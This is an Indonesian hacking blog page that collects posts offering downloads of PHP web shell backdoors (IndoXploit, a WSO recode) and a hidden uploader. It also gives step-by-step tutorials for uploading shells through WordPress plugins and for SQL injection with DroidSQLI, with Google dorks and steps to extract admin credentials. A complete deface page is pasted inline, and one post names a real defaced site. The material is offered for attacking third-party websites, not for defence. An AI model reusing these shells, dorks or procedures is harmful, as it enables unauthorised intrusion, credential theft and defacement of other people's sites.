Infinite Haxor: Search results for Download Shell Backdoor

News Ticker

Latest Posts
Search results for Download Shell Backdoor

Download Indoxploit Shell Backdoor First Version V.2 - Terupdate

- No Comments

Apa Itu Shell ?

Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Backdoor juga bisa dibilang jalan alternatif  untuk masuk ke sebuah sistem tanpa diketahui oleh operator sistem. Backdoor biasanya dibuat untuk jaga-jaga kalau saja pintu masuk utama ke dalam sistem error. Backdoor juga bisa dibuat diluar sistem, biasanya para peretas yang membuatnya, supaya dapat mengakses data sistem tanpa memasuki pintu utama sistem. 

Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit.

Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali.

# IndoXploit Shell First Edition [ V.2 ]


Login Shell Default : IndoXploit
Download Rawindoxploit.phphttps://gist.github.com/khaibar45/f47e9bd22f244fe6cb3e39b98a3f1b64

Download File : Indoxploit.php Fitur:

# K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.

# Back Connect

# CPanel/FTP Auto Deface:

-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja.

# Config Grabb :

-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel

#Jumping [error fixed] :
#Jumping hpshere & Jumping /var/vhosts [ updated ]

-> Kelebihannyaa bisa langsung ambil nama domainnyaa :
-> Cpanel Crack [blank user/pass fixed]:

Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config , Tetapi Hanya beberapa cms Tertentu Saja

-> Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Terkait :

- Idx Shell 
- Idx Shell V.3 
- Idx Shell V.2 
- Download Shell Idx Terbaru 
- Download Shell Backdoor Indoxploit 
- Indoxploit Shell 
- idx.php 
- Shell Backdoor Keren
- Download Shell php
- Shell Backdoor

Download Backdoor Scanner v.1 Menemukan File Backdoor Di Website - Terbaru

- No Comments

Cara Menemukan Shell Backdoor / File Backdoor Di Sebuah Website , Yang Sudah Pernah Di Deface (Hack) Sebelumnya Oleh Hacker Yang Tidak Bertanggung Jawab .

Apa Itu Backdoor Scanner ?

Backdoor Scanner Adalah Program Yang Bisa Menganalisa Atau Mencari Letak Shell Tersembunyi  ( Hidden Shell ) Di Sebuah Web Yang Sudah Anda Upload Shell Sebelumnya.


Bagaimana Cara Kerjanya ?


Baca Juga :

Lihat Step by Step Tutorial Ini !

1. Buka Web Yang Sudah Anda Upload Shell Sebelumnya ,Extract File Backdoor Scanner Terlebih Dahulu > Lalu Upload File Backdoor Shell Scanner Nya ( Download Backdoor Scannner Dibawah )


2. Sesudah Anda Upload > Buka Filenya 




3.  Centang Semua Biar Lebih Detail , Jika Ingi Scan Tipe Lain Tinggal Centang Other Keyword > Lalu Klik Start Scan .


4. Tunggu Sampai Proses Scanning Selesai 




5. Biru    = Shell Backdoor Yang Sudah Ditemukan

    Hijau  = File Biasa
    Merah = Backdoor Scanner Kalian

Baca Juga :

6. Klik Directory Shell Yang Berwarna Biru > Kalian Bisa Delete , Edit Shell Tersebut .


.:: Download ::.
Password File : nubihax0r

Baca Juga :

Terkait :

- Download Backdoor Scanner
- Cara Mengetahui Letak Shell
- Cara Mendapatkan Shell Gratis
- inurl:/idx.php intext:IndoXploit
inurl:/images/ intitle:sh3ll ext:php
intitle:sh3ll ext:php "/public_html/"
- Cara Menemukan Shell Di Website - Terbaru
- Cara Akses Shell
- Cara Mencari Shell
- Download Scanner Backdoor
- Download Shell Scanner

Download Hidden Uploader Shell Terbaru Untuk Deface

- No Comments

Apa Itu Hidden Uploader ?

Hidden Uploader Pastinya Sudah Diketahui Oleh Banyak Defacer Indonesia Kegunaannya Adalah Untuk Mengupload Script Deface Bahkan Shell Backdoor .

Baca Juga :

Untuk Apa Hidden Uploader ?

Untuk Para Defacer Yang Agak Susah Mengupload Langsung Filenya Di Web Target , Salah Satu Alasannya Web Tersebut Tidak Bisa Di Upload Dengan Format .php Tetapi Bisa Dengan .phtml .

Hidden Shell Ini Support File Dengan Extense .php, .php4, .php5 , Bahkan .phtml .

Baca Juga :

Jangan Lupa Persiapkan Shell Backdoornya, Download Shell Backdoor Disini Dan Script Defacenya Disini

Berikut Tampilan Hax0r Hidden Shell Backdoor Uploadernya :




Download Hax0r Hidden Shell Uploader Dibawah Ini :




Server 1
Server 2


Setelah Berhasil Upload Ke Web target, Cara Membuka File Hidden Uploadernya Tambahkan ?infinite=haxor

> Contoh
http://www.target.co.li/namafile.php?infinite=haxor

Jangan Lupa Share , Komentar & Follow Blog Kami .

Download Shell Backdoor Deface Keren Fitur Lengkap - Terbaru

- No Comments

  • Apa Itu Shell ?


Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.

Kali ini saia membuat D4RK FR13NDS SHELL (Recode Shell Wso)
Cocok untuk melakukan Backconnect (rooting server)
Oke Langsung Sadja ini Tampilannya

Jika Ingin Belajar Lebih Banyak Tentang Rooting Server Baca Disini Cara Rooting Server With Ngrok
Tampilan Shell


Download Dibawah :

Tutorial Upload Shell Di CMS Wordpress

- No Comments


WordPress adalah sebuah aplikasi sumber terbuka (open source) yang sangat populer digunakan sebagai mesin blog (blog engine). WordPress dibangun dengan bahasa pemrograman PHP dan basis data (database) MySQL. PHP dan MySQL, keduanya merupakan perangkat lunak sumber terbuka (open source software). Selain sebagai blog, WordPress juga mulai digunakan sebagai sebuah CMS (Content Management System) karena kemampuannya untuk dimodifikasi dan disesuaikan dengan kebutuhan penggunanya.


Sementara Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya)

Langsung To The Point :

1. Target Kalian Yang Sudah Bisa Login Ke WP-Admin Login .

2. Lalu cari Dan Pilih Plugins > Add New  > Upload Plugins > Pilih Shell > Install Now (Lihat Gambar Step by Step)


Jika Belum Punya Shell Download Shell Backdoor Ini 


  • Step 1
Klik Plugins > Add New , Kalian Akan Dialihkan Ke Upload Shell ,Klik Gambar Agar Jelas :



  • Step 2

Klik Upload Lalu Upload Shell Yang Udah Kalia Siapkan. 

Baca Juga :



  •  Step 3
Setelah Berhasil Selesai Upload , Disini Tinggal Isi FTP User & Password .


4. Lalu Ke Media > Library Dan Klik Shell Kalian > Buka Url (Lihat Gambar Step by Step)


  • Step 1
Klik 2x


  • Step 2
Salin Url , Isi Description Terserah



  •  SUKSES 
Buka Url Yang Sudah Kalian Salin Di New Tab :



Kalau Shell Kalian Mengalami DIR Merah Pada CMS Wordpress Kalian Bisa Lihat Cara Lain Mengatasi Jumping DIR Merah [CMS WORDPRESS]

Jika Kurang Paham Dengan Tutor Di Atas , Silahkan Liat Video Ini :

                                   

Tutorial Cara Lain Mengatasi Jumping DIR Merah [CMS WORDPRESS]

- No Comments

Pernah Mengalami DIR Merah Saat Dapat Target Lain Dari Jumping ? Pasti Pernah Dong
Oke kali ini NubiHaxor akan memberikan solusinya ^_^
Cara ini saya menggunakan CMS Wordpress dan Apabila ada yang lain saya tidak tau sama atau tidak caranya .


Oke langsung saja, saya disini menggunakan shell IndoXploit untuk shell lainnya saya tidak tau juga :"v
Pilih [ Auto Edit Title WordPress ]



Ubah Set Title sesuai keinginan kalian, Edit Content Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.
Saya disini pilih yang simple saja :'v


Setelah itu Klik Hajar dan Buka URL yang berwarna Hijau - Jika URL berwarna Merah maka cari Hati yg lain saja,.. Maksudnya Target gitu lhoo :"D (Bisa Lihat Gambar)


Jika Tidak Punya Shell , Download Shell Backdoor Anniversary D4RK FRI3NDS 

Selesai .
My Target : aramnews1st.com
Jika Niat Cantumkan Nick Kami : ./MaqloeGeming / ./Mr.Java404 & AbrarKUN .

Copas ? Sertakan Sumber :)

Download Script Deface Terbaru Keren Dan Simple Terbaik - Terbaru 2018

- No Comments

Apa Itu Deface ?


Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan(hack) suatu website baik halaman utama  atau index filenya (Script Deface Atau Shell Deface)  ataupun halaman lain yang masih terkait dalam satu  url dengan website tersebut (bisa di folder atau di file).Deface adalah teknik mengganti atau menyisipkan file (Script Deface Atau Shell Deface) pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.


Baca : Download Shell Backdoor Full Fitur

Baca Juga :

.::Download ::.


Atau Copy Paste Dibawah

<html> 
<head> 
<script> var message="Sorry Admin Im Stuck In Your Website";
///////////////////////////////////
function clickIE4(){if (event.button==2){alert(message);return false;}} function clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(message);return false;}}} if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;} else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;} document.oncontextmenu=new Function("alert(message);return false")</script>
<link rel="shortcut icon" href="https://image.ibb.co/eaEdow/22330780_844699822351982_1675505716_n.png">
<img width=0 height=0  src='https://s17.postimg.org/had2uyqz3/111111.jpg'/>
<meta charset='utf-8'> 
<meta name='description' content='AbrarKUN, Ghost At Your System'>
<meta name='keywords' content='AbrarKUN, 99Syndicate'> 
<title>0wn3d AbrarKUN</title>
<script language="javascript"src="http://ykubnay.yn.lt/Js/salju/teal.js"type="text/javascript">
<script src="//helperblogger.ucoz.com/code/snow-effect3.js"></script>
<link rel='short icon' href='http://oi66.tinypic.com/aa7n7k.jpg'> 
<link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'> 
<link href='https://fonts.googleapis.com/css?family=Lobster' rel='stylesheet' type='text/css'> 
<link rel='stylesheet' type='text/css' href='http://fonts.googleapis.com/css?family=Share+Tech +Mono'> 
<link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'> 
<link href='http://fonts.googleapis.com/css?family=Wallpoet' rel='stylesheet' type='text/css'> 
<link href='https://fonts.googleapis.com/css?family=Gloria+Hallelujah|Permanent+Marker' rel='stylesheet'> 
<link href='https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker' rel='stylesheet'> 
<link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'> 
<link href='http://fonts.googleapis.com/css?family=Tahoma' rel='stylesheet' type='text/css'> 
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' 
</head> 
<center> 
  <img  src='https://s1.postimg.org/6zgfzcba73/masdracos.jpg' rel='dofollow'  title='~ AbrarKUN ~ My Family Team ^_^  ~'/>
</center>
<body bgcolor='black' oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
<style> .error { text-align: center; font-family: 'Gilda Display', serif; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; overflow: default; } .info { text-align: center; width: 200px; height: 60px; margin: auto; position: absolute; top: 280px; bottom: 0; left: 20px; right: 0; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; } .info:after { content: 'OWNED'; font-family: OCR-A; font-size: 100px; text-align: center; width: 800px; margin: auto; position: absolute; top: 20px; bottom: 0; left: 40px; right: 0; opacity: 0; color: white; -webkit-animation: noise-1 .2s linear infinite; animation: noise-1 .2s linear infinite; } @-webkit-keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @-webkit-keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @-webkit-keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @-webkit-keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } @keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } .wrap { top: 30%; left: 25%; height: 200px; margin-top: -100px; position: absolute; } code { color: white; } span.blue { color: #48beef; } span.comment { color: #7f8c8d; } span.orange { color: #f39c12; } span.green { color: #33cc33; } .viewFull { font-family:OCR-A; color:orange; text-decoration:; }   } @media only screen and (min-height: 500px) { .viewFull{ display:none;    } }  </style> <center> <style> img { filter:alpha(opacity=70); -moz-opacity:0.7; opacity:0.7; } img:hover { filter:alpha(opacity=100); -moz-opacity:.0; opacity:1.0; } </style> 
<body bgcolor='black'/>
<center>
<b> 
<style type="text/css"> 
<!-- .style2 {font-size: small} .style4 {color: #FF0000; font-weight: bold; } .style5 {color: #FFFFFF} .style8 {color: #FFFFFF; font-weight: bold; } .style10 {color: #FF0000} --> </style> 
<body bgcolor="black"> 
<div align="center"> </span></font></b>
<font color="white"> 
<style> body { background: #000; font-family: "Audiowide", Verdana, sans-serif; } h1 { color: #333; font-size: 40px; margin: 1px auto; text-align:center; text-transform:uppercase; } .neon { color: #FFFFFF; text-shadow: 0 0 5px #ff0000, 0 0 10px #ff0000, 0 0 20px #ff0000, 0 0 45px #ff0000, 0 0 40px #ff0000; } </style> <script language="JavaScript1.2"> function ClearError() {return true;} window.onerror = ClearError; </script> </style>&nbsp;<script> window.onload = function() { var h1 = document.getElementsByTagName("h1")[0], text = h1.innerText || h1.textContent, split = [], i, lit = 0, timer = null; for(i = 0; i < text.length; ++i) { split.push("<span>" + text[i] + "</span>"); } h1.innerHTML = split.join(""); split = h1.childNodes; var flicker = function() { lit += 0.01; if(lit >= 1) { clearInterval(timer); } for(i = 0; i < split.length; ++i) { if(Math.random() < lit) { split[i].className = "neon"; } else { split[i].className = ""; } } } setInterval(flicker, 100); } </script> </head> 


<div class="error"> 
<font color="white" size="5" face="Audiowide">~ AbrarKUN ~</font> 
</div>
<br>
<font color="red" size="5" face='Audiowide'># </font>
<font color="white" size="4" face='Audiowide'>D4RK FR13ND5 ~ Ollot2 Ghost ~ 99Syndicate</font>
<font color="red" size="5" face='Audiowide'> #</font></center>
<font color='white' size='3' face='courier new'> <b></b> 
<div 0px="" 20px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: none;">
</div>
<script language="JavaScript"> javascript:startTyping(text, 60, "textDestination"); </script> <style type="text/css"> @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono); body { background : #000; font-family : Courier new; text-align : center; color  : #fff; } hr { border  : 0; height  : 1px; background-image : linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 0, 0, 0.75), rgba (0, 0, 0, 0)) } </style> </font>
<b>
<br>
<font color='grey' size='5' face='Papyrus'>~ Nge Rap Dulu Buat Si Anjing ~</font>
<br>
<marquee direction='right'><font color='grey' size='4' face='Iceland'>BlackDoor |  ./Decrypt | N53W3D | ./Altha4ngel | r00t666h0st | pETAcr007 | Abenk#007 | ./MaqloeGeming | SGBFANK_Music | Mr.Cakil | <font size="3" face="Audiowide" color="red">AbrarKUN</font> | Blackh0rs3 | MR.CRYPTON | ./Mr.N'ReaL/. | ^XF4p^ | /Ace | CyberIXZ  | MR_SAD | Mr.CL4Y404 | Zero_7D | Mr.c4N9c1L |</font></marquee>
<center> 
<marquee direction='left'><font color='grey' size='4' face='Iceland'>| ./Presiden.ZoRRo |<font size="3" face="Audiowide" color="red"> AbrarKUN</font> | ./Mr_MF52 | KidsCoder | \.D3V3NT3R.ID./ | //R3f71N | Mr.M0U53_K1LL3R21 | A.N.B.U CYBER | F4KS3C | Yu29 | <font size="3" face="Audiowide" color="red">AbrarKUN</font> | SGFANK_404 | AkanoNime | HADI053 | Mr.B45T4RD | Mr.D4n3Xx#404</font></marquee>
<center> 
<br>
<a><font color="white" size="3" face="Audiowide"> .:: Find Me ::. </a>
<iframe width="1" height="1" src="https://www.youtube.com/embed/dOykCh3iZq0?rel=0&autoplay=1&loop=1&playlist=Pp19cgOb8TA" frameborder="0" allowfullscreen></iframe><p>
<center>
</center>
<center><input type="button" value="Contact" onclick="alert('nubihaxor@gmail.com');"style="font-size:1em;background:white"</a><input type="button" value="Track Me" onclick="alert('FUCK YOU!!');" style="font-size:1em;background:green"></a></center>
<center>
<br>
<font color="red" size="4" face='Audiowide'>#</font>
<a href='http://www.nubihaxor.com' target='_blank'><font color="white" size="4" face='Iceland'>nubihaxor </font>
<font color="red" size="4" face='Audiowide'>#</font></center>
<style type='text/css'>body, a:hover {cursor: url(http://cur.cursors-4u.net/symbols/sym- 1/sym46.cur), progress ! important;} </style> </head> </html>

Tutorial Cara Mudah Deface Dengan DroidSQLI Terbaru Tanpa Root .

- No Comments


  • Apa Itu Deface ?


Deface adalah suatu kegiatan untuk merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau disebuah file). Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agarhasil kerjanya diketahui oleh khalayak hacker. Sebenarnya ada banyak tekhnik deface, namun Disini Kita akan Belajar Tekhnik SQLI yang dapat kalian lakukan secara mudah diandroid tanpa memerlukan akses root . Yaitu Dengan Aplikasi DroidSQLI .

Jika Kalian Ingin Belajar Tutorial Via PC Bisa Lihat Di Tutorial Deface Dengan WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD .

Cara ini cukup mudah dilakukan karena hanya memanfaatkan celah SQLi pada sebuah website
To The Point .

1.Niat

2.Cari target sasaran. Bisa kalian mencarinya digoogle menggunakan dork dibawah ini: 
Inurl:"index.php?id="
Inurl:"data.php?id="

3.Koneksi Internet yang cukup lancar

4. Segelas kopi ( Tidak Wajib )

Bahan-bahan diatas sudah disiapkan?
Jika sudah kita akan langsung menuju ketutor nya :
  • Cari target yang vuln SQLI. silahkan kalian ngedork digoogle. Caranya tinggal salin kode dork diatas lalu search di Google. Maka akan muncul ribuan situs. Untuk mengetes apakah website tersebut rentan terhadap SQLI bisa kalian tambahkan tanda ( ' ) dibelakang url. 

Contoh: www.target.com/index.php?id=3 lalu tambahkan tanda menjadi www.target.com/index.php?id=3' lalu tekan enter.

Jika terjadi error atau mucul tulisan You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1maka website tersebut dapat kita deface menggunakan DroidSQLI. Jika sudah dapat contoh http://www.minutesemeiotic.org/home.php?id=1
  • Buka aplikasi DroidSQLi yang sudah kalian download tadi.Masukkan target kalian ke kolom "Target Url"


  • Klik tombol "Inject" yang berada dipojok kanan atas.
  • Biarkan aplikasi mengeksekusi target.
  • Jika sudah selesai maka akan muncul database website tersebut.


  • Buka databasenya. Contoh punya mimin nama databasenya [purport]
  • Karena tujuan kita deface,maka kita akan mencari dimana letak data admin berada.Biasanya terletak di table_admin atau table_user.Pokoknya cari aja yg berhubungan dengan admin


  • Nah punya ane data adminnya berada di wp_users(ingat!setiap website berbeda-beda).Langsung aja kita buka wp_users nya.
  • Dan kita berhasil nemu data adminnya .


  • Langsung aja centang data yg ingin kalian ketahui.misal username & password,setelah itu klik "Get Records"



  • Nah itu dah ketemu nama & pass admin.
  • Namun password tersebut masih berbentik md5 jadi kalian harus merubahnya dulu menggunakan tools Disini
  • Jika sudah kalian tinggal login kewebsite tersebut. Untuk mencari halaman login admin kalian bisa menggunakan tools ini Klik Disini
Jika Bisa Kalian Up Shell Supaya Bisa Tebas Index , Jika Belum Punya Shell Lihat Artikel Download Shell Backdoor Terbaru

Link Download :